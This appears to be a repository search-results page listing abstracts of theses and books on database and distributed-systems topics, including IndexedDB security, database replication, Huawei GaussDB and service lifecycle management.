16 research outputs found
An Investigation into Possible Attacks on HTML5 IndexedDB and their Prevention
This thesis presents an analysis of, and enhanced security model for IndexedDB, the persistent HTML5 browser-based data store. In versions of HTML prior to HTML5, web sites used cookies to track user preferences locally. Cookies are however limited both in file size and number, and must also be added to every HTTP request, which increases web traffic unnecessarily. Web functionality has however increased significantly since cookies were introduced by Netscape in 1994. Consequently, web developers require additional capabilities to keep up with the evolution of the World Wide Web and growth in eCommerce. The response to this requirement was the IndexedDB API, which became an official W3C recommendation in January 2015. The IndexedDB API includes an Object Store, indices, and cursors and so gives HTML5 - compliant browsers a transactional database capability. Furthermore, once downloaded, IndexedDB data stores do not require network connectivity. This permits mobile web- based applications to work without a data connection. Such IndexedDB data stores will be used to store customer data, they will inevitably become targets for attackers.
This thesis firstly argues that the design of IndexedDB makes it unavoidably insecure. That is, every implementation is vulnerable to attacks such as Cross Site Scripting, and even data that has been deleted from databases may be stolen using appropriate software tools. This is demonstrated experimentally on both mobile and desktop browsers. IndexedDB is however capable of high performance even when compared to servers running optimized local databases. This is demonstrated through the development of a formal performance model. The performance predictions for IndexedDB were tested experimentally, and the results showed high conformance over a range of usage scenarios. This implies that IndexedDB is potentially a useful HTML5 API if the security issues can be addressed.
In the final component of this thesis, we propose and implement enhancements that correct the security weaknesses identified in IndexedDB. The enhancements use multifactor authentication, and so are resistant to Cross Site Scripting attacks. This enhancement is then demonstrated experimentally, showing that HTML5 IndexedDB may be used securely both online and offline. This implies that secure, standards compliant browser based applications with persistent local data stores may both feasible and efficient
Adaptive object management for distributed systems
This thesis describes an architecture supporting the management of pluggable software components and evaluates it against the requirement for an enterprise integration platform for the manufacturing and petrochemical industries. In a distributed environment, we need mechanisms to manage objects and their interactions. At the least, we must be able to create objects in different processes on different nodes; we must be able to link them together so that they can pass messages to each other across the network; and we must deliver their messages in a timely and reliable manner. Object based environments which support these services already exist, for example ANSAware(ANSA, 1989), DEC's Objectbroker(ACA,1992), Iona's Orbix(Orbix,1994)Yet such environments provide limited support for composing applications from pluggable components. Pluggability is the ability to install and configure a component into an environment dynamically when the component is used, without specifying static dependencies between components when they are produced. Pluggability is supported to a degree by dynamic binding. Components may be programmed to import references to other components and to explore their interfaces at runtime, without using static type dependencies. Yet thus overloads the component with the responsibility to explore bindings. What is still generally missing is an efficient general-purpose binding model for managing bindings between independently produced components. In addition, existing environments provide no clear strategy for dealing with fine grained objects. The overhead of runtime binding and remote messaging will severely reduce performance where there are a lot of objects with complex patterns of interaction. We need an adaptive approach to managing configurations of pluggable components according to the needs and constraints of the environment. Management is made difficult by embedding bindings in component implementations and by relying on strong typing as the only means of verifying and validating bindings. To solve these problems we have built a set of configuration tools on top of an existing distributed support environment. Specification tools facilitate the construction of independent pluggable components. Visual composition tools facilitate the configuration of components into applications and the verification of composite behaviours. A configuration model is constructed which maintains the environmental state. Adaptive management is made possible by changing the management policy according to this state. Such policy changes affect the location of objects, their bindings, and the choice of messaging system
Sixth Goddard Conference on Mass Storage Systems and Technologies Held in Cooperation with the Fifteenth IEEE Symposium on Mass Storage Systems
This document contains copies of those technical papers received in time for publication prior to the Sixth Goddard Conference on Mass Storage Systems and Technologies which is being held in cooperation with the Fifteenth IEEE Symposium on Mass Storage Systems at the University of Maryland-University College Inn and Conference Center March 23-26, 1998. As one of an ongoing series, this Conference continues to provide a forum for discussion of issues relevant to the management of large volumes of data. The Conference encourages all interested organizations to discuss long term mass storage requirements and experiences in fielding solutions. Emphasis is on current and future practical solutions addressing issues in data management, storage systems and media, data acquisition, long term retention of data, and data distribution. This year's discussion topics include architecture, tape optimization, new technology, performance, standards, site reports, vendor solutions. Tutorials will be available on shared file systems, file system backups, data mining, and the dynamics of obsolescence
Database Principles and Technologies – Based on Huawei GaussDB
This open access book contains eight chapters that deal with database technologies, including the development history of database, database fundamentals, introduction to SQL syntax, classification of SQL syntax, database security fundamentals, database development environment, database design fundamentals, and the application of Huawei’s cloud database product GaussDB database. This book can be used as a textbook for database courses in colleges and universities, and is also suitable as a reference book for the HCIA-GaussDB V1.5 certification examination. The Huawei GaussDB (for MySQL) used in the book is a Huawei cloud-based high-performance, highly applicable relational database that fully supports the syntax and functionality of the open source database MySQL. All the experiments in this book can be run on this database platform. As the world’s leading provider of ICT (information and communication technology) infrastructure and smart terminals, Huawei’s products range from digital data communication, cyber security, wireless technology, data storage, cloud computing, and smart computing to artificial intelligence
Database Principles and Technologies – Based on Huawei GaussDB
This open access book contains eight chapters that deal with database technologies, including the development history of database, database fundamentals, introduction to SQL syntax, classification of SQL syntax, database security fundamentals, database development environment, database design fundamentals, and the application of Huawei’s cloud database product GaussDB database. This book can be used as a textbook for database courses in colleges and universities, and is also suitable as a reference book for the HCIA-GaussDB V1.5 certification examination. The Huawei GaussDB (for MySQL) used in the book is a Huawei cloud-based high-performance, highly applicable relational database that fully supports the syntax and functionality of the open source database MySQL. All the experiments in this book can be run on this database platform. As the world’s leading provider of ICT (information and communication technology) infrastructure and smart terminals, Huawei’s products range from digital data communication, cyber security, wireless technology, data storage, cloud computing, and smart computing to artificial intelligence
Recommended from our members
Performance Implications of Using Diverse Redundancy for Database Replication
Using diverse redundancy for database replication is the focus of this thesis. Traditionally, database replication solutions have been built on the fail-stop failure assumption, i.e. that crashes are believed to cause a majority of failures. However, recent findings refuted this common assumption, showing that many of the faults cause systematic non-crash failures. These findings demonstrate that the existing, non-diverse database replication solutions, which use the same database server products, are ineffective fault-tolerant mechanisms. At the same time, the findings motivated the use of diverse redundancy (when different database server products are used) as a promising way of improving dependability. It seems that using a fault-tolerant server, built with diverse database servers, would deliver improvements in availability and failure rates compared with the individual database servers or their replicated, non-diverse configurations.
Besides the potential for improving dependability, one would like to evaluate the performance implications of using diverse redundancy in the context of database replication. This is the focal point of the research. The work performed to that end can be summarised as follows:
- We conducted a substantial performance evaluation of database replication using diverse redundancy. We compared its performance to the ones of various non-diverse configurations as well as non-replicated databases. The experiments revealed systematic differences in behaviour of diverse servers. They point to the potential for performance improvement when diverse servers are used. Under particular workloads diverse servers performed better than both non-diverse and non-replicated configurations.
- We devised a middleware-based database replication protocol, which provides dependability assurance and guarantees database consistency. It uses an eager update everywhere approach for replica control. Although we focus on the use of diverse database servers, the protocol can be used with the database servers from the same vendor too. We provide the correctness criteria of the protocol. Different regimes of operation of the protocol are defined, which would allow it to be dynamically optimised for either dependability or performance improvements. Additionally, it can be used in conjunction with high-performance replication solutions.
- We developed an experimental test harness for performance evaluation of different database replication solutions. It enabled us to evaluate the performance of the diverse database replication protocol, e.g. by comparing it against known replication solutions. We show that, as expected, the improved dependability exhibited by our replication protocol carries a performance overhead. Nevertheless, when optimised for performance improvement our protocol shows good performance.
- In order to minimise the performance penalty introduced by the replication we propose a scheme whereby the database server processes are prioritised to deliver performance improvements in cases of low to modest resource utilisation by the database servers.
- We performed an uncertainty-explicit assessment of database server products. Using an integrated approach, where both performance and reliability are considered, we rank different database server products to aid selection of the components for the fault-tolerant server built out of diverse databases
Architecture and implementation of online communities
Thesis (Ph.D.)--Massachusetts Institute of Technology, Dept. of Electrical Engineering and Computer Science, 1999.Includes bibliographical references.by Philip Greenspun.Ph.D
A Reference Architecture for Service Lifecycle Management – Construction and Application to Designing and Analyzing IT Support
Service-orientation and the underlying concept of service-oriented architectures are a means to successfully address the need for flexibility and interoperability of software applications, which in turn leads to improved IT support of business processes. With a growing level of diffusion, sophistication and maturity, the number of services and interdependencies is gradually rising. This increasingly requires companies to implement a systematic management of services along their entire lifecycle. Service lifecycle management (SLM), i.e., the management of services from the initiating idea to their disposal, is becoming a crucial success factor.
Not surprisingly, the academic and practice communities increasingly postulate comprehensive IT support for SLM to counteract the inherent complexity. The topic is still in its infancy, with no comprehensive models available that help evaluating and designing IT support in SLM. This thesis presents a reference architecture for SLM and applies it to the evaluation and designing of SLM IT support in companies. The artifact, which largely resulted from consortium research efforts, draws from an extensive analysis of existing SLM applications, case studies, focus group discussions, bilateral interviews and existing literature.
Formal procedure models and a configuration terminology allow adapting and applying the reference architecture to a company’s individual setting. Corresponding usage examples prove its applicability and demonstrate the arising benefits within various SLM IT support design and evaluation tasks. A statistical analysis of the knowledge embodied within the reference data leads to novel, highly significant findings. For example, contemporary standard applications do not yet emphasize the lifecycle concept but rather tend to focus on small parts of the lifecycle, especially on service operation. This forces user companies either into a best-of-breed or a custom-development strategy if they are to implement integrated IT support for their SLM activities. SLM software vendors and internal software development units need to undergo a paradigm shift in order to better reflect the numerous interdependencies and increasing intertwining within services’ lifecycles. The SLM architecture is a first step towards achieving this goal.:Content Overview
List of Figures....................................................................................... xi
List of Tables ...................................................................................... xiv
List of Abbreviations.......................................................................xviii
1 Introduction .................................................................................... 1
2 Foundations ................................................................................... 13
3 Architecture Structure and Strategy Layer .............................. 57
4 Process Layer ................................................................................ 75
5 Information Systems Layer ....................................................... 103
6 Architecture Application and Extension ................................. 137
7 Results, Evaluation and Outlook .............................................. 195
Appendix ..........................................................................................203
References .......................................................................................... 463
Curriculum Vitae.............................................................................. 498
Bibliographic Data............................................................................ 49
Data mining industry : emerging trends and new opportunities
Thesis (M.Eng.)--Massachusetts Institute of Technology, Dept. of Electrical Engineering and Computer Science, June 2000."May 2000."Includes bibliographical references (leaves 170-179).by Walter Alberto Aldana.M.Eng